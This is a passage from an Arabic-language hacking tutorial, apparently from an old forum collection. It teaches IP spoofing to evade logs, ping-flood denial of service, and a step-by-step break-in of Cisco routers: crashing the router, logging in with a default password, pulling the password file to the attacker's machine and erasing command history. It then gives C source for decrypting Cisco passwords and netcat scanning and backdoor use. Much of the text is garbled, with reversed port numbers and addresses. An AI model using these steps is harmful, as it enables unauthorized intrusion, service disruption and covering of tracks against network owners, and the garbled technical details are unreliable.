‫مرسل ھذه الحزمة او الجھ از المصدر ‪ ,‬وعلى فكره انت تقدر تكتب بنفسك‪ ‬‬ ‫‪packet‬او حزمة وتجعلھا كأنھ ا قادمة من مصدر اخر غیر المصدر الصلي اللي‪ ‬‬ ‫طلعت منه وبالتالي تقدر تحصل على صلحیات ادمین او روت او اي صلحیات‪ ‬‬ ‫انت عايزھ ا ‪ ...‬لكن خلي بالك ‪ ..‬علشان تعمل العملیة دي لزم تكون بتستخدم‬ ‫لینیكس حیث انه بیوفرلك اداوت تقدر تنفذ بیھ ا الطريقة دي ‪ ...‬ولكن ده مش‪ ‬‬ ‫موضوعنا الحالي‪ .‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫كیف تقوم بعمل ‪ spoof‬للـ‪ IP :‬‬‫حاول ان تحصل على برنامج مثل ‪ Genius 2‬او ‪ DC IS ..‬ودول ھايعملو على‪ ‬‬ ‫تزوير اليدينت بتاعك ‪ IdentD ,,‬يعني ھ ايتغیر جزء من عنوان جھازك على النت‪ ‬‬ ‫‪ ,‬وبأمكانك استعمال الطريقة دي على ‪ IRC‬حیث يمكنك الرجوع الى الروم اللي‬ ‫انت باند فیھ ا وذلك عن طريق تغییر اليدينت كما يمكنك استخدام عملیة ال‪ ‬‬ ‫‪spoof‬اثناء محاولة الحصول على صلحیات روت على الجھزة الخرى ‪ ...‬حیث‪ ‬‬ ‫ان الي بي اللي ھايتخزن في ملفات الـ ‪ logs‬ھايكون الي بي المزور‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫كیف اقوم باستخدام‪ Telnet :‬‬‫بأمكانك تشغیل الـ ‪ telnet‬ببساطه عن طريق الذھاب الى ‪ Start Menu‬ثم‪ ‬‬ ‫تختار ‪ Run‬ثم تكتب في المربع ‪ Telnet‬‬ ‫اضغط على ‪ Terminal > Preferences ,‬ھنا تقدر تغیر ‪ buffer size‬و ‪ font‬‬ ‫واشیاء اخرى ‪ ,‬كما تستطیع ايضا فتح او اغلق ‪ "local echo" .‬وفي حالت فتح‪ ‬‬ ‫او تشغیل ‪ local echo‬فسیكون بأمكانك رؤية كل شيء تكتبه في نافذة التلنت‪ ‬‬ ‫كما سیكون بمقدورك رؤية مايكتبه الخرون في الحال‪ .‬‬ ‫‪ 363‬‬ ‫في الغالب يكون التلنیت متظبط على انه يتصل بـ ‪ telnet port‬اللي ھو رقم ‪32‬‬ ‫‪,‬ولكن انت بمقدورك تغییر رقم البورت في حالة رغبتك في التصال على اية‪ ‬‬ ‫خدمة او بورت اخر مثل بورت رقم ‪ 52‬بتاع المیل او بورت رقم ‪ 12‬لخمدة ال ‪FTP‬‬ ‫وغیرھ ا من البورتات ‪ ,,,,‬يوجد اللف من المنافذ لذا يجب تحديد وجھتك قبل‪ ‬‬ ‫التصال‪ .‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫كیف استخدم‪ HyperTerminal :‬‬‫‪HyperTerminal‬يقوم بفتح "‪ "server‬على اي بورت في جھازك لیقوم‪ ‬‬ ‫بالستماع الى المعلومات القادمة الى جھازك من الجھزة الخرى اللي انت‪ ‬‬ ‫تحددھا‪ ‬‬ ‫ولتشغیل ‪ HyperTerminal‬اذھب الى < ‪ Start > Programs > Accessories‬‬ ‫‪Communications > HyperTerminal .‬في البداية يجب علیك اختیار نوع‪ ‬‬ ‫التصال ‪ ..‬لذا قم بأختیار "‪ "TCP/IP Winsock‬ثم حدد الھوست او الي بي ثم‪ ‬‬ ‫حدد البورت واعمل اتصال او ‪ Call ..‬وتقدر تخلي البرنامج على وظیفة الستماع‬ ‫او ‪ listening‬لستقبال المعلومات القادمة من اجھزة اخرى عن طريق اختیار‪ ‬‬ ‫‪Call > Wait for Call ,‬كما تستطیع عمل ‪ Chat‬او نقل للملفات عن طريق ھذا‬ ‫البرنامج‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫كیف استفید من‪ Ping :‬‬‫اداة ‪ Ping‬تعتبر من ابسط الدوات ‪ ,‬كل اللي علیك انك تفتح نافذة ‪ MS­DOS‬‬ ‫‪prompt‬ثم تقوم بكتابة ‪ "ping ip.address" ,‬في العادة ھ ايعمل بنج ثلث مرات‬ ‫ثم يتوقف ‪ ,‬ولكن انت بأمكانك كتابة‪ :‬‬ ‫‪ ""ping ip.address ­t‬‬ ‫وده يخلیه يعمل بنج بدون توقف ‪ ,‬ولتغییر حجم حزمة البنج المرسلة ‪ ..‬اكتب‪ :‬‬ ‫‪ ""ping ­l (size) ip.address‬‬ ‫وعملیة ‪ Ping‬ھي عبارة عن ارسال حزمة داتا الى جھاز معین تقوم بتحديده ثم‬ ‫ترى الرد على الحزمة اللي انت ارسلتھا ‪ ,‬وتقدر تستفید من الموضوع ده في‪ ‬‬


‫معرفة سرعة التصال للجھاز ‪ .‬و الـ ‪ Ping‬ايضا يمكنه ان يقوم بتھنیج الجھاز او‪ ‬‬ ‫انھیاره وذلك عن طريق عمل ‪ ping floods‬اي ارسال حزم كثیرة ذات احجام‪ ‬‬ ‫كبیرة بسرعة وبدون توقف الى احد الجھزة ‪ . Windows 89‬ممكن ينھار بعد‪ ‬‬ ‫‪ 463‬‬ ‫دقیقة واحده فقط من ‪ ping flood‬علیه ‪ ,‬وذلك لن البنج يقوم بأستھلك حجم‪ ‬‬ ‫كبیر من الـ ‪ bandwidth‬ممكن يؤدي الى قطع التصال او تھنیج النظام‪ .‬‬ ‫واحب اوضح ان عملیة ‪ Ping flooding‬ضد الھ داف الكبیرة زي سیرفرات مواقع‪ ‬‬ ‫مثل يكون غیر مجدي وغیر فعال‪ ‬‬ ‫ملحظة ‪ :‬اختیار ‪ ­t‬مع البنج ل يعني انه فلوود حقیقي ‪ ,‬ولكن يعني عمل بنج‪ ‬‬ ‫للھ دف بصورة مستمرة ‪ .‬بینما في جمیع توزيعات ‪ Unix‬او ‪ Linux‬يمكنك‪ ‬‬ ‫استخدام الخاصیة ‪ ping ­f‬لعمل فلووود بنج حقیقي وفعال‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫كیف استخدم‪ TraceRoute :‬‬‫عملیة ‪ TraceRoute‬تستخدم لتتبع جھ از او اي بي معین ‪ ,‬يعني مثل لتقوم‪ ‬‬ ‫بتتبع اتصالك لكي تعرف الجھزة اللي بینك وبین الھدف ‪ ,‬كل اللي علیك انك‪ ‬‬ ‫تفتح نافذة ‪ MS­DOS prompt‬ثم تقوم بكتابة "‪ "tracert ip.address‬وسوف‪ ‬‬ ‫تظھر لك قائمة بالجھزة اللي بینك وبین الجھاز الھدف ‪ .‬ومن خلل الحكاية دي‬ ‫تقدر تحدد اذا كان فیه ‪ firewalls‬موجوده او تحديد ‪ ISP (internet service‬‬ ‫(‪provider‬لي شخص‪ ‬‬ ‫وساقوم الن بشرح مبسط وموجز لمیكانیكیة عمل ‪ TraceRoute‬لكي يسھل‪ ‬‬ ‫علیك فھمھا‪ :‬‬ ‫اول عند قیامك بأمر ‪ TraceRoute‬على اي بي او جھاز معین فیقوم جھازك‪ ‬‬ ‫بارسال ‪ TCP/IP packet‬تحتوي على قیمة معینة في الـ ‪ header‬بتاع الحزمة ‪,‬‬ ‫ھذه القیمة تسمى ‪ TTL‬وھي اختصار لـ ‪ Time To Live .‬وعند مرور الحزمة‪ ‬‬ ‫على الجھ زة والراوترات فتنقص قیمة الـ ‪ TTL‬بمقدار واحد عند كل راوتر او جھاز‬ ‫‪ ,‬والحكاية دي مھ مة جدا ‪ ..‬لن احیانا يحصل خطأ معین في اي حاجه سواء‪ ‬‬ ‫في الحزمة او الجھ زة مما يؤدي الى ان الحزمة تفضل ماشیة في الشبكة‪ ‬‬ ‫بدون توقف وتقوم باستھ لك كمیة كبیرة من الـ ‪ bandwidth ,‬ولھذا عندنا ينقص‬ ‫مقدار الـ ‪ TTL‬ويصل الى الصفر ‪ ..‬فتموت الحزمة ويقوم بروتوكول ‪ ICMP‬بأرسال‪ ‬‬ ‫رسالة خطأ الى مرسل الحزمة‪ ‬‬ ‫اما اذا لم يوجد اخطاء فأن الحزمة ستقوم بأرسال رسالة الى مرسلھا عند‪ ‬‬ ‫مرورھا على كل جھ از او راوتر الى ان تصل الى الجھاز الھدف‪ ‬‬ ‫اتمنى تكونو فھمتو على القل الفكرة العامة للـ ‪ TraceRoute‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ 563‬‬ ‫كیف استعمل ‪ proxy server :‬‬‫قم بالبحث في شبكة النترنت عن اي من ‪ proxy server‬على البورت اللي‪ ‬‬ ‫انت عاوزه ‪ ,‬وعندما تجد احدھا قم بالتصال به عن طريق ‪ telnet‬او‪ ‬‬ ‫‪hyperterminal‬او غیرھا وبعد كده قم بالتصال بأجھزة اخرى من خلل ھذا‪ ‬‬ ‫البروكسي وبكده فلن يعرف احد عنوان الي بي الحقیقي لك‪ ‬‬ ‫===========================================‬ ‫===‪ ‬‬ ‫الفصل الول ‪ :‬لماذا اقوم بأختراق ‪ cisco router‬؟‪ ‬‬‫اعتقد ان البعض ھ ايسأل نفسه ‪ ..‬لماذا اقوم بأختراق ‪ cisco router‬؟‪ ‬‬ ‫وانا عارف ان البعض يقوم بالختراق بھدف التخريب بس ‪ ..‬ولكن لو ھو حدد‪ ‬‬ ‫الھ دف المنشود من عملیة الختراق وعرف ممكن يستفید من النظام اللي‪ ‬‬ ‫اخترقه ازاي فسوف يختلف الوضع تماما ‪ ...‬خلونا نشوف ايه الفايدة من اختراق‬ ‫‪ cisco routers‬‬ ‫اول ‪ :‬راوترات سیسكو تتمیز بسرعة عالیة جدا حیث انھا تستخدم نظام اتصال‪ ‬‬ ‫‪1 T 81‬الفائق السرعة ‪ ,‬واحنا شرحنا الدرس اللي فات وظیفة راوترات سیسكو‬


‫في ربط الشبكات ‪ ...‬يعني تخیل مثل ان راوتر خارج منه العديد من خطوط‪ ‬‬ ‫النترنت الى سیرفرات او ‪ ISP‬وكل سیرفر او ‪ ISP‬طالع منه خطوط تانیه لجھزة‪ ‬‬ ‫اخرى فتخیل السرعة اللي لزم يكون علیھا الراوتر علشان يقدر يمد كل‪ ‬‬ ‫الجھزة دي بالسرعة اللزمة لھ ا ‪ ...‬اذن نستنتج من ھنا انك تقدر تستخدم‪ ‬‬ ‫الراوتر في ھجوم ‪ DENIAL OF SERVICE‬اللي بیكون مؤثر اذا كان الھجوم له‪ ‬‬ ‫سرعة عالیة زي الراوتر كده كما تستطیع اختراق انظمة اخرى من خلل الراوتر‬ ‫زي ماوضحنا قبل كده في الدرس اللي فات وذلك عن طريق استغلل خدمة الـ‬ ‫‪Telnet‬الموجودة في الراوتر‪ .‬‬ ‫ايضا يجب ان تعرف ان ھناك الف من الـ ‪ packets‬او الحزم تمر عبر وخلل ھذا‪ ‬‬ ‫الراوتر وبالتالي تستطیع ان تقوم بالتقاط بعض ھذه الحزم ثم تقوم بعمل‪ ‬‬ ‫‪decoded‬لھ ا ورؤية كل المعلومات السرية والخاصة والباسوردات و و و و‪ ....‬‬ ‫التي تمر عبر الراوتر‪ ‬‬ ‫واضیفلك معلومة كمان وھي ان راوترات سیسكو ھي ‪ trusted systems‬زي‪ ‬‬ ‫اداوت يونیكس ‪ rcp‬و ‪ rsh‬اللي بتديك اكسس وصلحیات في الشبكة المحلیة‪ ‬‬ ‫‪ 663‬‬ ‫بتاعتھا وبالتالي تقدر تشوف شغلك على الجھزة اللي موجودة في الشبكة )‪ ‬‬ ‫للمزيد من المعلومات عن اداوت ‪ rcp‬و ‪ rsh‬راجع الدرس اللي كتبته بعنوان‪ ‬‬ ‫‪ )Network Services‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫الفصل الثاني ‪ :‬كیف اعثر على ‪ cisco router‬؟‪ ‬‬‫عملیة ايجاد راوتر سیسكو ھ ي عملیة بسیطة وقانونیة ‪,‬دائما مايكون لدى‪ ‬‬ ‫اي ‪ ISP‬راوتر خاص به و معظم ھ ذه الراوترات تكون من نوع سیسكو وتقدر انت‪ ‬‬ ‫تجیب عنوان اي بي الراوتر عن طريق انك تعمل ‪ traceroute‬على اي مستخدم‬ ‫من مستخدمي ‪ ISP‬معین ( شرحنا فوق عملیة ( ‪ ISP‬وبعد ماتعمل‪ ‬‬ ‫‪traceroute‬على الـ ‪ IP‬فسیقوم باظھار كل الجھزة واليبیھات اللي بینك وبینه‬ ‫ومن ضمنھم اي بي الـ ‪ ISP‬واي بي الراوتر بتاعه وغیره ‪ ...‬واحنا يھمنا ھنا اي‪ ‬‬ ‫بي الراوتر بس ‪ ,‬وده مثال‪ :‬‬ ‫‪ 22.22.222.222 tracert‬‬ ‫‪ ]45.42.322.122[ Tracing route to‬‬ ‫‪ .over a maximum of 30 hops‬‬ ‫‪ ]12.22.222.222[ 1 147ms 122ms 132ms your.isp‬‬ ‫‪ ]02.22.222.222[ 2 122ms 143ms 123ms isp.firewall‬‬ ‫‪ ]33.44.22.702[ 3 156ms 142MS 122ms aol.com‬‬ ‫‪ 4 * * * Request timed out‬‬ ‫‪ ]33.44.33.491[ 5 101ms 102ms 133ms cisco.router‬‬ ‫‪ ]11.11.11.111[ 6 233ms 143ms 102ms something.ip‬‬ ‫‪ ]12.12.11.221[ 7 222ms 123ms 213ms netcom.com‬‬ ‫‪ ]33.12.12.121[ 8 152ms 211ms 212ms blahblah.tts.net‬‬ ‫‪ 9 122ms 223ms 243ms altavista.34.com [121.22.32.43] <<< target's‬‬ ‫‪ isp‬‬ ‫‪ 10 101ms 122ms 132ms 221.223.24.54.altavista.34.com‬‬ ‫[‪ ]45.42.322.122‬‬ ‫‪ .Trace complete‬‬ ‫قم بتحويل المثال الى الیسار علشان تقدر تشوفه‪ ‬‬ ‫نلحظ عند الجھاز الخامس انه راوتر سیسكو‪ ‬‬ ‫‪ 763‬‬ ‫دلوئتي انت حددت الراوتر وعنوانه ‪ ,‬لكن احتمال ان الراوتر يكون محمي بـ‪ ‬‬ ‫‪firewall‬علشان كده لزم تبعتله بنج ‪ Ping‬مرتین وتنتظر الرد ‪ ,‬فلو طلع فیه رد‪ ‬‬ ‫اذن ده مؤشر ان الراوتر معلیھوش حماية من ‪ firewall‬اما لو لقیت مفیش رد‪ ‬‬ ‫يبئى تعرف ان الراوتر علیه حماية من ‪ firewall‬وان الي بي بتاعك اتعمله بلوك‬


‫من الراوتر‪ ‬‬ ‫طرقة تانیة لمعرفت ان كان يوجد ‪ firewall‬او لء ھ ي انك تفتح التیلنت وتشبك‪ ‬‬ ‫على الراوتر عن طريق البورت رقم ‪ 32‬عادي ‪ ....‬فلو طلعلك حاجه بتقولك ادخل‬ ‫الباسورد ومفیش يوزر نیم ‪ ..‬اذن تعرف انك دلوئتي على الراوتر ‪ ,‬اما لو طلعلك‪ ‬‬ ‫رسالة بتقولك ادخل الیوزر نیم والباسورد فتعرف ان انت دلوئتي موجود داخل‪ ‬‬ ‫الفاير وول‪ ‬‬ ‫من الخر كده علشان تريح دماغي ودماغك ‪ ..‬دورلك على راوتر مش محمي‪ ‬‬ ‫من فايروول ‪ ,‬ويبئى لینا لقاء تاني عن موضوع الفايروول ده ‪ .‬المھم دلوئتي اول‬ ‫ماتلقي راوتر كويس كده و ابن حلل ومعلیھ وش فايروول ‪ ..‬ابدء بالبحث عن‪ ‬‬ ‫‪proxy server‬يسمح بالتصال عن طريق البورت ‪ 32‬علشان الي بي بتاعك ل‪ ‬‬ ‫يتم تسجیله في ملفات الـ ‪ LOGs‬للراوتر‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫الفصل الثالث ‪ :‬كیف اقوم بكسر ‪ cisco router‬والدخول الیه‪ ‬‬‫معظم راوترات سیسكو تقوم بتشغیل نظام ‪ v4.1 software‬على الجھاز اللي‪ ‬‬ ‫يعتبر ضعیف الحماية ‪ .‬فبأمكانك انك تشبك على الراوتر عن طريق التیلنت‪ ‬‬ ‫بالبورت ‪ 32‬ثم تقوم بأدخال باسورد كبیرة وطويلة مثل ھذه ‪ :‬‬ ‫‪ 483920110293847465qpwoeirutyalskdjfhgzmxncbv019dsk‬‬ ‫‪ 7465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpw‬‬ ‫‪ oeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiruty‬‬ ‫‪ alskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjf‬‬ ‫‪ hgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxnc‬‬ ‫‪ bv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019ds‬‬ ‫‪ k10293847465qpwoeirutyalskdjfhgzmxncbv019dsk‬‬ ‫انتظر قلیل ‪ ..‬فیه احتمال ان الراوتر يحصله ‪ reboot‬او ريستارات ‪ ,‬طبعا مش‪ ‬‬ ‫ھاتقدر تخترقه لنه ‪ offline‬في الحالة دي ‪ .‬لكن غالبا مش ھايحصله ريستارت‬ ‫‪ 863‬‬ ‫‪ ..‬انما ھاتحصله عملیة ‪ freeze‬او يھنج لفتره تمتد من ‪ 01-2‬دقايق وفي الفترة‬ ‫دي انت لزم تعمل على اختراق الراوتر‪ ‬‬ ‫اما لو حصل اي حاجه غیر كده فذلك يعني ان نظام تشغیل الراوتر لیس ‪ 1.4v‬‬ ‫‪software ..‬وان الباسورد الطويلة ان تنجح معاه ‪ ,‬والحل؟‪ ‬‬ ‫في الحالة دي ممكن تستخدم ھجوم ‪ DOS‬على الراوتر ‪ ..‬زي مثل فلووود بنج‬ ‫‪ ,‬روح للدوس واكتب ‪ "ping ­l 56550 cisco.router.ip ­t" ,‬وده ھايجیب نفس‪ ‬‬ ‫النتائج اللي في الحالة الولى‪ ‬‬ ‫دلوئتي واثناء الراوتر في حالة ‪ frozen‬او تھ نیج ‪ ..‬قم بفتح كونكشن او اتصال‪ ‬‬ ‫تاني مع الراوتر عن طريق بروكسي اخر ( لزم يكون بروكسي يختلف عن الول‬ ‫) وبعد كده اكتب الباسورد دي ‪ "admin" ....‬ممكن واحد يسأل ويقول لماذا لم‪ ‬‬ ‫يتم استخدام الباسورد من الول ؟‪ ‬‬ ‫والسبب ھو ان ھذه الباسورد ھي الـ ‪ default password‬لغلب راوترات‪ ‬‬ ‫سیسكو ‪ ,‬وعندما يكون الراوتر في حالة ‪ frozen‬او تھنیج فأنه يعد نفسه على‪ ‬‬ ‫وضع الـ ‪ default‬بتاعه‪ ‬‬ ‫والن وبعد دخولك الى الراوتر يجب علیك طلب ملف الباسورد ‪ ,‬لزم تعرف ان‪ ‬‬ ‫انظمة تشغیل راوترات سیسكو متعدده ولیس نظام واحد ولكن الـ ‪ prompt‬‬ ‫الشائع لھا غالبا مايكون زي كده ‪ : "htl­textil" ,‬الن قم بكتابة "?" علشان‪ ‬‬ ‫تظھر قائمة الوامر وطبعا ھاتظھ رلك قايمة كبیرة من الوامر ‪ ,‬حاول تبحث عن‪ ‬‬ ‫امر النقل ‪ transfer command ..‬ثم استخدمه للحصول على ملف الباسورد‪ ‬‬ ‫للدمین ( خلي بالك انك الدمین حالیا ) ثم قم بأرسال الملف الى عنوان ‪ IP‬‬ ‫الخاص بك على البورت ‪ .. 32‬ولكن قبل ان ترسل الملف الى جھازك يجب ان‪ ‬‬ ‫تعمل التي‪ :‬‬ ‫قم بتشغیل برنامج ) ‪ HyperTerminal‬تم شرح البرنامج في اول الموضوع (‪ ‬‬ ‫وبعد تشغیله قم بجعله على وضع ‪ wait for a call‬من راوتر سیسكو ‪ ..‬يعني‪ ‬‬


‫تخلي البرنامج على وضعیة الترقب لنتظار اشارة من عنوان راوتر سیسكو ‪ .‬‬ ‫ودلوئتي اول ماتقوم بأرسال الملف من الراوتر ‪ ..‬فسوف يقوم برنامج‪ ‬‬ ‫‪ HyperTerminal‬بسؤالك ان كنت تريد استقبل الملف المرسل من الراوتر ‪ ,‬‬ ‫اختار ‪ yes‬واحفظ الملف على الھ ارد عندك ‪ .‬وقبل ماتخرج من الراوتر وتفصل ‪ ..‬‬ ‫قم بمسح الـ ‪ history‬علشان محدش يعرف انك دخلت وذلك عن طريق كتابة‪ ‬‬ ‫المر التالي في التريمینال"‪ "history size 0‬‬ ‫وبعد كده اعمل‪ Logout‬‬ ‫وبكده اقدر اقولك انك خلصت اھم الجزء الصعب والھم في الموضوع كله ‪ ...‬‬ ‫تقدر تستريح شوية دلوئتي علشان تستعد لكسر الباسورد اللي حصلت‪ ‬‬ ‫علیھا‪ ‬‬ ‫‪ 963‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‬‬ ‫الفصل الرابع ‪ :‬كیف اقوم بكسر الباسوردات لـ ‪ cisco router‬؟‪ ‬‬‫والن وبعد ان قمت بأحضار ملف الباسورد الى جھازك فأنت محتاج لكسره لكي‬ ‫تمتلك الباسوردات اللي تمنحك الصلحیات الكاملة لدخول الراوتر مرة اخرى ‪ .‬‬ ‫ولعمل ذلك ‪ ..‬قم بأستخدام برنامج مثل ‪ John the Ripper‬او اي برنامج اخر‪ ‬‬ ‫لكسر الباسوردات‪ .‬‬ ‫دي تعتبر اسھل طريقة وانا انصح بھا ‪ .‬والطريقة الخرى ھي فك تشفیر الملف‪ ‬‬ ‫‪ ,‬وسوف تحتاج الى برامج فك التشفیر ‪ ..‬ويوجد منھا الكثیر ‪ ..‬وممكن عن‪ ‬‬ ‫طريق الكواد البرمجیة التي تقوم بفك التشفیر وكسر الباسوردات‪ ‬‬ ‫وده كود يقوم بفك تشفیر باسورد راوترات سیسكو ‪ .‬وانت علیك تعمله ‪compile‬‬ ‫تحت نظام يونیكس او لینیكس‪ ‬‬ ‫اعمل ‪ Ctli + Shift‬لرؤية الكود بالطريقة السلیمة‪ ‬‬ ‫‪ >#include <stdio.h‬‬ ‫‪ >#include <ctype.h‬‬ ‫‪ { = ][char xlat‬‬ ‫‪ ,0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f‬‬ ‫‪ ,270x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x‬‬ ‫‪ 440x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x‬‬ ‫};‪ ‬‬ ‫‪ ;" 7 char pw_str1[] = "password‬‬ ‫‪ ;" 7 char pw_str2[] = "enable­password‬‬ ‫‪ ;char *pname‬‬ ‫‪ )cdecrypt(enc_pw, dec_pw‬‬ ‫‪ ;char *enc_pw‬‬ ‫‪ ;char *dec_pw‬‬ ‫‪ 073‬‬ ‫{‪ ‬‬ ‫;‪ unsigned int seed, i, val = 0‬‬ ‫)‪ if(strlen(enc_pw) & 1‬‬ ‫;)‪ return(­1‬‬ ‫;'‪ seed = (enc_pw[0] ­ '0') * 10 + enc_pw[1] ­ '0‬‬ ‫))]‪if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1‬‬ ‫;)‪ return(­1‬‬ ‫{‪ for (i = 2 ; i <= strlen(enc_pw); i++) ‬‬ ‫{‪ if(i !=2 && !(i & 1)) ‬‬ ‫;]‪ dec_pw[i / 2 ­ 2] = val ^ xlat[seed++‬‬ ‫;‪ val = 0‬‬ ‫}‪ ‬‬ ‫;‪ val *= 16‬‬


if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) { val += enc_pw[i] ­ '0'; continue; } if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') { val += enc_pw[i] ­ 'A' + 10; continue; } if(strlen(enc_pw) != i) return(­1); } dec_pw[++i / 2] = 0; 371 return(0); } usage() { fprintf(stdout, "Usage: %s ­p <encrypted password>\n", pname); fprintf(stdout, " %s <router config file> <output file>\n", pname); return(0); } main(argc,argv) int argc; char **argv; { FILE *in = stdin, *out = stdout; char line[257]; char passwd[65]; unsigned int i, pw_pos; pname = argv[0]; if(argc > 1) { if(argc > 3) { usage(); exit(1); } if(argv[1][0] == '­') { switch(argv[1][1]) { 372 case 'h': usage(); break; case 'p': if(cdecrypt(argv[2], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } fprintf(stdout, "password: %s\n", passwd); break;


default: fprintf(stderr, "%s: unknow option.", pname); } return(0); } if((in = fopen(argv[1], "rt")) == NULL) exit(1); if(argc > 2) if((out = fopen(argv[2], "wt")) == NULL) exit(1); } while(1) { for(i = 0; i < 256; i++) { if((line[i] = fgetc(in)) == EOF) { if(i) break; fclose(in); fclose(out); 373 return(0); } if(line[i] == '\r') i­­; if(line[i] == '\n') break; } pw_pos = 0; line[i] = 0; if(!strncmp(line, pw_str1, strlen(pw_str1))) pw_pos = strlen(pw_str1); if(!strncmp(line, pw_str2, strlen(pw_str2))) pw_pos = strlen(pw_str2); if(!pw_pos) { fprintf(stdout, "%s\n", line); continue; } if(cdecrypt(&line[pw_pos], passwd)) { fprintf(stderr, "Error.\n"); exit(1); } else { if(pw_pos == strlen(pw_str1)) fprintf(out, "%s", pw_str1); else fprintf(out, "%s", pw_str2); fprintf(out, "%s\n", passwd); } 374 } }


‫ فالطريقة الوحیدة ھي استخدام برنامج زي‬Linux ‫اما اذا لم تكن تمتلك نظام‬ .‫او اي برنامج كسر باسورد اخر‬John the Ripper ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ John the Ripper‫لتحمیل برنامج‬ http://www.openwall.com/john/ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‫ودي قايمة بأشھ ر اوامر راوترات سیسكو واللي موجوده في جمیع السوفت وير‬ ‫بتاعتھا‬ <1­99> Session number to resume access­enable Create a temporary Access­List entry access­profile Apply user­profile to interface clear Reset functions connect Open a terminal connection disable Turn off privileged commands disconnect Disconnect an existing network connection enable Turn on privileged commands exit Exit from the EXEC help Description of the interactive help system lock Lock the terminal login Log in as a particular user logout Exit from the EXEC mls exec mls router commands mrinfo Request neighbor and version information from a multicast router mstat Show statistics after multiple multicast traceroutes 375 mtrace Trace reverse multicast path from destination to source name­connection Name an existing network connection pad Open a X.29 PAD connection ping Send echo messages ppp Start IETF Point­to­Point Protocol (PPP) resume Resume an active network connection rlogin Open an rlogin connection set Set system parameter (not config) show Show running system information slip Start Serial­line IP (SLIP) systat Display information about terminal lines telnet Open a telnet connection terminal Set terminal line parameters traceroute Trace route to destination tunnel Open a tunnel connection where List active connections x28 Become an X.28 PAD x3 Set X.3 parameters on PAD 376 (NetCat)‫اختراق السیرفرات عن طريق النت كات‬ Dr.Death:‫للكاتب‬ ‫ والختراق بواسطتھا‬net cat ‫الیوم بنتكلم عن موضوع خطیر جدا اداة النت كات‬ . ‫ لكن يمكن‬, ‫ ھ ي فالحقیقه موجوده فالیونكس‬, ‫البرنامج اداه من ادوات الدوس‬


.‫انزلھا للويندوز والتعامل معھا‬ ‫ و‬TCP ‫النت كات عباره عن اداه قابلة للكتباه والقرائه عبر اتصالت الشبكات‬ UDP . ‫ التنصت على البورتات‬, ‫ مثل بورت سكان‬, ‫ولھ ا استخدامات كثیره جدا و خطیره‬ .‫ والعمل باك دور‬, : ‫لتحمیل النت كات من ھنا‬ http://www.members.lycos.co.uk/harleymotor/hack/netcat.zip :‫اول شي بستعرض بعض اھم اوامر النت كات‬ ­e specifies a program to exec after making/receiving a connection ­g gateway source­routing hop point[s], up to 8 ­G num source­routing oiter: 4, 8, 12 ­i secs delay interval for lines sent, ports scanned ­l listen mode for inbound connections ­n only accept numeric IP addresses , no DNS ­o file hex dump of traffic ­p port local port number ­r randomize ­s addr local source address ­t netcat will respond to telnet option negotiation "this allows it to connect to a telnetd and get past initial negotiation far enough to get a login prompt from the server" ­u UDP connection mode 377 ­v verbose mode ­w secs wait ­ timeout for connects ]­z zero I/O mode [used for scanning .For NT netcat, all of the above options exist, plus a few others ­d detach ­ don't open a new DOS window ­L keep listening after the current session terminates ‫ والخطوات الي يجب ان نقوم‬, ‫بنتكلم عن طريق الختراق بواسطة النت كات‬ :‫بھا‬ :‫اول البورت سكان‬ : nc –v –z ‫تقدر تسوي سكان على البورتات عن طريق ھذا المر‬ 002­1 09.1.861.291 : nc –v –w2 –z 09.1.861.291 1-002 ‫او المر ھذا‬ ‫ھذا ھو ايبي الجھاز او الموقع الي تبغي تسوي علیه بورت‬09.1.861.291 .‫سكان‬ : ping ‫مثل‬ ping ,. ‫طبعن علشان تطلع ايبي الموقع سو له‬ /http://www.drdeathx.com ‫ اذا ماصار تجاوب‬, ‫ مثل انا اخترت ثانیتین‬, ‫ھذا لتحديد مدة التصال‬2 W ‫المر‬ .‫ اختصار للوقت‬, ‫يروح على البورت الي بعده‬ 1 ‫ انا اخترت البورتات من‬, ‫ھذي ھي البورتات الي سوينا سكان بینھم‬002-1 002 .‫الى‬ 873 . ‫ بورت المتصفح والتلنت والف تي بي وغیرھم‬, ‫شوفو النتئائج شو طلعت لنا‬ .‫ومكتوب حذالھم البورت مفتوح وله ل‬ :‫ثانیا التصال بالبورتات‬ ‫ مثل المعلومات الي يعطینا اياھا‬, ‫مثل عندنا موقع ونبغي نطلع معلومات عنه‬


